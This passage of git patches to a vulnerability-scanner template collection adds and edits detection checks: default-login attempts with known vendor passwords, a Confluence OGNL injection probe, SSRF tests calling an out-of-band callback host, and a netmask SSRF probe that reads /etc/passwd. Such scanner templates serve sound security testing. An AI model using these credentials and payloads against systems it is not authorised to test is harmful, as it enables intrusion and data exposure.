authentication, by appending a GET variable with the relevant substring (like "?.gif"). reference: | - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 From 5ae8bf50889c0a39900fe66312cde19317810441 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:32:17 +0200 Subject: [PATCH 14/35] Added CS141 SNMP template to default-logins --- default-logins/abb/cs141-default-login.yaml | 64 +++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 default-logins/abb/cs141-default-login.yaml diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml new file mode 100644 index 0000000000..25b6b8a36e --- /dev/null +++ b/default-logins/abb/cs141-default-login.yaml @@ -0,0 +1,64 @@ +id: cs141-default-login + +info: + name: CS141 SNMP Module Default Credentials + author: socketz + severity: medium + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf + tags: hiawatha,iot,default-login + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"admin","password":"cs141-snmp"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"engineer","password":"engineer"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"guest","password":"guest"} + + matchers-condition: and + matchers: + - type: word + words: + - 'accessToken' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - accessToken From 35570987e0eb68170e1e129bfc6d0dd11dd99326 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:47:28 +0200 Subject: [PATCH 15/35] Removed useless template --- .../http-present-security-headers.yaml | 116 ------------------ 1 file changed, 116 deletions(-) delete mode 100644 miscellaneous/http-present-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml deleted file mode 100644 index 66b98f6ea2..0000000000 --- a/miscellaneous/http-present-security-headers.yaml +++ /dev/null @@ -1,116 +0,0 @@ -id: http-present-security-headers - -info: - name: HTTP Present Security Headers - author: socketz - severity: info - description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers - -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 3 - extractors: - - type: regex - part: header - group: 0 - regex: - - "(?im)(Strict-Transport-Security):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Frame-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Content-Type-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Content-Security-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Referrer-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Clear-Site-Data):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Embedder-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Opener-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Resource-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSS-Protection):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Public-Key-Pins):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Except-CT):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Feature-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Permissions-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Document-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRFToken):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Authorization):(.*)" From 5472deb9b4b6ee53e31e6a3c4e26ec77fe14cfed Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 14:05:10 +0530 Subject: [PATCH 16/35] Update cs141-default-login.yaml --- default-logins/abb/cs141-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 25b6b8a36e..cb51eede2c 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -20,7 +20,7 @@ requests: Connection: close {"userName":"admin","password":"cs141-snmp"} - + - | POST /api/login HTTP/1.1 Host: {{Hostname}} From c2048eb6b596559b67f3ddef363b62b17c3f0a7a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 22:07:29 +0530 Subject: [PATCH 17/35] Added CVE-2021-22145 Co-Authored-By: Dhiyaneshwaran --- cves/2021/CVE-2021-22145.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-22145.yaml diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml new file mode 100644 index 0000000000..e018f535d1 --- /dev/null +++ b/cves/2021/CVE-2021-22145.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-22145 + +info: + name: ElasticSearch 7.13.3 - Memory disclosure + author: dhiyaneshDk + severity: medium + description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml + - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 + - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html + tags: cve,cve2021,elascticsearch + +requests: + - method: POST + path: + - '{{BaseURL}}/_bulk' + headers: + Content-Type: application/json + body: | + @ + + matchers-condition: and + matchers: + + - type: word + words: + - 'root_cause' + - 'truncated' + - 'reason' + part: body + condition: and + + - type: status + status: + - 400 From fb0aabfe968068b3d0748d1194e720b5c20b8c96 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 2 Sep 2021 13:35:07 -0400 Subject: [PATCH 18/35] Update CVE-2021-26084.yaml Extra paths were I did found vulnerable assets --- cves/2021/CVE-2021-26084.yaml | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index c37f54cd81..8ed6fb59a8 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -1,7 +1,7 @@ id: CVE-2021-26084 info: - author: dhiyaneshDk + author: dhiyaneshDk,philippedelteil severity: critical name: Confluence Server OGNL injection - RCE description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. @@ -19,7 +19,23 @@ requests: Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + - raw: + - | + POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + - raw: + - | + POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -29,4 +45,4 @@ requests: - type: word part: body words: - - 'value="aaaa{140592=null}' \ No newline at end of file + - 'value="aaaa{140592=null}' From f0197ae9ac301013a81d974d54b5d2cb72e58b10 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Thu, 2 Sep 2021 12:13:21 -0700 Subject: [PATCH 19/35] Added CVE-2020-28976.yaml Template --- cves/2020/CVE-2020-28976.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2020/CVE-2020-28976.yaml diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml new file mode 100644 index 0000000000..c3cb68cde0 --- /dev/null +++ b/cves/2020/CVE-2020-28976.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-28976 + +info: + name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) + author: LogicalHunter + severity: high + reference: + - https://www.exploit-db.com/exploits/49189 + - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + tags: cve,cve2020,ssrf,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + matchers: + - type: word + part: interactsh-protocol + words: + - "http" + From 6e7c3ab0a2aa55829d42e467249edce69dbfdb14 Mon Sep 17 00:00:00 2001 From: Borna Nematzadeh <88947751+LogicalHunter@users.noreply.github.com> Date: Thu, 2 Sep 2021 12:26:10 -0700 Subject: [PATCH 20/35] Update CVE-2020-28976.yaml --- cves/2020/CVE-2020-28976.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index c3cb68cde0..b7189961be 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -15,10 +15,8 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" - matchers: - type: word part: interactsh-protocol words: - "http" - From 58a886ad6e7657bfe4ff9789659769edd8400ec6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 3 Sep 2021 09:24:21 +0530 Subject: [PATCH 21/35] Update CVE-2020-28976.yaml --- cves/2020/CVE-2020-28976.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index b7189961be..97b6dcc096 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter severity: high + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 @@ -17,6 +18,6 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" matchers: - type: word - part: interactsh-protocol + part: interactsh_protocol words: - "http" From 56af312e250265fb02590ea718cab1d4a2f5ca46 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Thu, 2 Sep 2021 22:48:24 -0600 Subject: [PATCH 22/35] Added an additional check Hello, when you get the change, please check the changes. I removed some of the methods and cleaned it up + made a matcher for /etc/passwd. Thanks! --- cves/2021/CVE-2021-28918.yaml | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 1f0f3c4456..8256fd4662 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,7 +1,7 @@ id: CVE-2021-28918 info: - name: Netmask NPM Package SSRF + name: Netmask npm Package SSRF author: johnjhacking severity: critical description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. @@ -15,19 +15,24 @@ requests: - method: GET path: - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - + - type: word part: body words: - "Apache Server Status" - "Server Version" - condition: and \ No newline at end of file + condition: and + + - type: word + part: body + words: + - "root:x:0:0:root:" + condition: or From 2d104a005348741262a7bce6a0fc028d6f825e01 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:40:20 +0530 Subject: [PATCH 23/35] Added multiple endpoint support --- cves/2021/CVE-2021-26084.yaml | 33 ++++++++++++++++----------------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 8ed6fb59a8..1ef19a23c1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -8,34 +8,33 @@ info: tags: cve,cve2021,rce,confluence reference: - https://jira.atlassian.com/browse/CONFSERVER-67940 - - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://github.com/Udyz/CVE-2021-26084 requests: - raw: - | - POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + POST /{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - raw: - - | - POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - - raw: - - | - POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - templates/editor-preload-container + - users/user-dark-features - queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: status From c41a4985053c4e73c41b66ef67668a5a19b70b8b Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:52:27 +0530 Subject: [PATCH 24/35] added tags --- cves/2020/CVE-2020-28976.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 97b6dcc096..00e084429e 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 - tags: cve,cve2020,ssrf,wordpress,wp-plugin + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob requests: - method: GET @@ -16,6 +16,8 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + stop-at-first-match: true matchers: - type: word part: interactsh_protocol From f81851b53b19e234744b4380514193125892f919 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 13:10:35 +0530 Subject: [PATCH 25/35] few fixes --- cves/2021/CVE-2021-28918.yaml | 21 ++++++++------------- 1 file changed, 8 insertions(+), 13 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 8256fd4662..f7008e8785 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,12 +1,12 @@ id: CVE-2021-28918 info: - name: Netmask npm Package SSRF + name: Netmask NPM Package SSRF author: johnjhacking severity: critical description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi - reference: | + reference: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/advisories/GHSA-pch5-whg9-qr2r @@ -18,21 +18,16 @@ requests: - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - "Apache Server Status" - "Server Version" condition: and - - - type: word - part: body - words: - - "root:x:0:0:root:" - condition: or + + - type: regex + regex: + - "root:.*:0:0:" From eea43b6304efc07539eabe46dbed4324fc4d253f Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 13:14:24 +0530 Subject: [PATCH 26/35] Update CVE-2021-28918.yaml --- cves/2021/CVE-2021-28918.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index f7008e8785..d591e23f66 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -7,9 +7,9 @@ info: description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi reference: - - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - - https://github.com/advisories/GHSA-pch5-whg9-qr2r + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r requests: - method: GET From 216c66771ff6d9fc1c8714e8066ae9395a72989c Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 13:52:53 +0530 Subject: [PATCH 27/35] Added CVE-2017-18638 Co-Authored-By: bigzero <3676342+bigzero@users.noreply.github.com> --- cves/2017/CVE-2017-18638.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2017/CVE-2017-18638.yaml diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml new file mode 100644 index 0000000000..ee5dd415b7 --- /dev/null +++ b/cves/2017/CVE-2017-18638.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-18638 + +info: + name: Graphite "graphite.composer.views.send_email" SSRF + author: huowuzhao + severity: high + description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + reference: + - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html + - https://github.com/graphite-project/graphite-web/issues/2008 + - https://github.com/advisories/GHSA-vfj6-275q-4pvm + - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + tags: cve,cve2017,graphite,ssrf,oob + +requests: + - method: GET + path: + - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" From 064cc0c29f97208d0244b2c62a9c4d3a9a3e9b6b Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 13:56:09 +0530 Subject: [PATCH 28/35] Update CVE-2017-18638.yaml Co-Authored-By: bigzeroo <39177268+bigzeroo@users.noreply.github.com> --- cves/2017/CVE-2017-18638.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index ee5dd415b7..bf1abb9b15 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -1,7 +1,7 @@ id: CVE-2017-18638 info: - name: Graphite "graphite.composer.views.send_email" SSRF + name: Graphite 'graphite.composer.views.send_email' SSRF author: huowuzhao severity: high description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. From ac4bce9ca58ceecde41e9d999d4008d740bd17a2 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 11:28:42 -0500 Subject: [PATCH 29/35] Update php-errors.yaml Made better through use of regex extractors. More useful information is displayed on-screen. --- misconfiguration/php-errors.yaml | 47 ++++++++++++++++++-------------- 1 file changed, 26 insertions(+), 21 deletions(-) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index d4b4f20178..11e7defb9f 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -2,31 +2,36 @@ id: php_errors info: name: PHP errors - author: w4cky_ + author: w4cky_,geeknik severity: info - tags: debug + tags: debug,php requests: - method: GET path: - "{{BaseURL}}" - matchers: - - type: word - words: - - "Fatal error" - - "Call to undefined method" - - "You have an error in your SQL syntax;" - - "MySQL server version for the right syntax to use near" - - "PHP Warning" - - "PHP Error" - - "Warning: mysql_connect():" - - "Warning: mysql_query()" - - "Warning: pg_connect():" - - "failed to open stream: HTTP request failed" - - "SAFE MODE Restriction in effect." - - "Cannot modify header information" - - "ORA-00921: unexpected end of SQL command" - - "ORA-00933: SQL command not properly ended" - - "ORA-00936: missing expression" - - "ORA-12541: TNS:no listener" \ No newline at end of file + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)PHP (Warning|Error)' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)(syntax|parse) error' From d27dadb79ef4901962673a90427d47fe132911a9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:24:11 +0530 Subject: [PATCH 30/35] updated matchers --- .../http-missing-security-headers.yaml | 146 ++++++++++-------- 1 file changed, 80 insertions(+), 66 deletions(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 350fcbe9db..97d80d6c05 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -11,103 +11,117 @@ requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 3 matchers-condition: or matchers: - - type: word - name: "Strict-Transport-Security" - words: - - "Strict-Transport-Security" - part: header + - type: regex + name: strict-transport-security + regex: + - "(?i)strict-transport-security" negative: true - - type: word - name: "Content-Security-Policy" - words: - - "Content-Security-Policy" part: header + + - type: regex + name: content-security-policy + regex: + - "(?i)content-security-policy" negative: true - - type: word - name: "X-Frame-Options" - words: - - "X-Frame-Options" part: header + + - type: regex + name: x-frame-options + regex: + - "(?i)x-frame-options" negative: true - - type: word - name: "X-Content-Type-Options" - words: - - "X-Content-Type-Options" part: header + + - type: regex + name: x-content-type-options + regex: + - "(?i)x-content-type-options" negative: true - - type: word - name: "X-Permitted-Cross-Domain-Policies" - words: - - "X-Permitted-Cross-Domain-Policies" part: header + + - type: regex + name: x-permitted-cross-domain-policies + regex: + - "(?i)x-permitted-cross-domain-policies" negative: true - - type: word - name: "Referrer-Policy" - words: - - "Referrer-Policy" part: header + + - type: regex + name: referrer-policy + regex: + - "(?i)referrer-policy" negative: true - - type: word - name: "Clear-Site-Data" - words: - - "Clear-Site-Data" part: header + + - type: regex + name: clear-site-data + regex: + - "(?i)clear-site-data" negative: true - - type: word - name: "Cross-Origin-Embedder-Policy" - words: - - "Cross-Origin-Embedder-Policy" part: header + + - type: regex + name: cross-origin-embedder-policy + regex: + - "(?i)cross-origin-embedder-policy" negative: true - - type: word - name: "Cross-Origin-Opener-Policy" - words: - - "Cross-Origin-Opener-Policy" part: header + + - type: regex + name: cross-origin-opener-policy + regex: + - "(?i)cross-origin-opener-policy" negative: true - - type: word - name: "Cross-Origin-Resource-Policy" - words: - - "Cross-Origin-Resource-Policy" part: header + + - type: regex + name: cross-origin-resource-policy + regex: + - "(?i)cross-origin-resource-policy" negative: true - - type: word - name: "Access-Control-Allow-Origin" - words: - - "Access-Control-Allow-Origin" part: header + + - type: regex + name: access-control-allow-origin + regex: + - "(?i)access-control-allow-origin" negative: true - - type: word - name: "Access-Control-Allow-Credentials" - words: - - "Access-Control-Allow-Credentials" part: header + + - type: regex + name: access-control-allow-credentials + regex: + - "(?i)access-control-allow-credentials" negative: true - - type: word - name: "Access-Control-Expose-Headers" - words: - - "Access-Control-Expose-Headers" part: header + + - type: regex + name: access-control-expose-headers + regex: + - "(?i)access-control-expose-headers" negative: true - - type: word - name: "Access-Control-Max-Age" - words: - - "Access-Control-Max-Age" part: header + + - type: regex + name: access-control-max-age + regex: + - "(?i)access-control-max-age" negative: true - - type: word - name: "Access-Control-Allow-Methods" - words: - - "Access-Control-Allow-Methods" part: header + + - type: regex + name: access-control-allow-methods + regex: + - "(?i)access-control-allow-methods" negative: true - - type: word - name: "Access-Control-Allow-Headers" - words: - - "Access-Control-Allow-Headers" part: header - negative: true + + - type: regex + name: access-control-allow-headers + regex: + - "(?i)access-control-allow-headers" \ No newline at end of file From da27280259b5e870d1ed11bc12e30ff6500b0621 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:26:23 +0530 Subject: [PATCH 31/35] Added stop-at-first-match --- default-logins/abb/cs141-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index cb51eede2c..531ed5ae2d 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -45,6 +45,7 @@ requests: {"userName":"guest","password":"guest"} + stop-at-first-match: true matchers-condition: and matchers: - type: word From f6c72769cee9a58a4cb3e110418008c0a8d805ba Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 3 Sep 2021 22:29:55 +0530 Subject: [PATCH 32/35] temporary moving to another branch --- cves/2020/CVE-2020-11420.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml deleted file mode 100644 index be676408b1..0000000000 --- a/cves/2020/CVE-2020-11420.yaml 